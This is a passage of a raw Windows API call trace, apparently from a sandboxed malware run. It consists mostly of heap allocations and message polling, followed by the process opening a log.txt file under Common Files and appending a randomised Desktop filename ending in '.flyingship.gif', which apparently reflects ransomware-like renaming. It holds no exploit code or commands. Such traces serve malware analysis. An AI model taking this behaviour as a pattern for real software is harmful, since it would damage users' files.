lpMsg=0x87f194) returned 0 [0166.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0166.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0166.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0166.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0166.933] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0166.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0166.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0166.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0166.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0166.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0166.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0166.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0166.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0166.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0166.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0166.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0166.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0166.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0166.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0166.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0166.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0166.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0166.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0166.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0166.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0166.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0166.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0166.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0166.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0166.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0166.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0166.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0166.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0166.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0166.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0166.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0166.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0166.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0166.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0166.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0166.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0166.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0166.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0166.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0166.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0166.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0166.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0166.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0166.935] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0166.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0166.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0166.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0166.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0166.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0166.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0166.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0166.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0166.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0166.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0166.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0166.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0166.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0166.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0166.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0166.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0166.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0166.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0166.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0166.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0166.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0166.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0166.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0166.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0166.936] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0166.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0166.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0166.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0166.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0166.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0166.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0166.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0166.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0166.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0166.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0166.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0166.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0166.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0166.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0166.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0166.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0166.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0166.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0166.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0166.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0166.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0166.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0166.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0166.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0166.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0166.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0166.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0166.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0166.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0166.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0166.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0166.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0166.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0166.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x120) returned 0x8fff00 [0166.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0166.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0166.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0166.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0166.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0166.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0166.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0166.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0166.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0166.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0166.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0166.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0166.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0166.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0166.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0166.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0166.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0166.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0166.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9c5180 [0166.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0166.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0166.938] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0166.940] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.940] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0166.940] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.940] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0166.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0166.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0166.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0166.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0166.942] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0166.942] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0xaaa, lpOverlapped=0x0) returned 1 [0166.942] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0166.942] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xaaa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.942] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0166.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0166.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0166.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0166.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0166.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.flyingship.gif\r\n", cchWideChar=76, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 76 [0166.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4c) returned 0x923ad0 [0166.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.flyingship.gif\r\n", cchWideChar=76, lpMultiByteStr=0x923ad0, cbMultiByte=76, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.flyingship.gif\r\n", lpUsedDefaultChar=0x0) returned 76 [0166.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0166.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0166.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0166.943] WriteFile (in: hFile=0x120, lpBuffer=0x923a78*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923a78*, lpNumberOfBytesWritten=0x87f43c*=0x4b, lpOverlapped=0x0) returned 1 [0166.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0166.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0166.943] CloseHandle (hObject=0x120) returned 1 [0166.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0166.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0166.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0166.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0166.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0166.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0166.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0166.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0166.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0166.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0166.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0166.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0166.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0166.946] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0166.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0166.946] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0166.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0166.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0166.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0166.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0166.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0166.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0166.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0166.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0166.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0166.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0166.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0166.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0166.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0166.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0166.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0166.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0166.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0166.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0166.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0166.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0166.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0166.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0166.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0166.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0166.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0166.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0166.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0166.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0166.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0166.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0166.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0166.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0166.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0166.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0166.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0166.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0166.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0166.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0166.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0166.948] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0166.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0166.948] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0166.948] 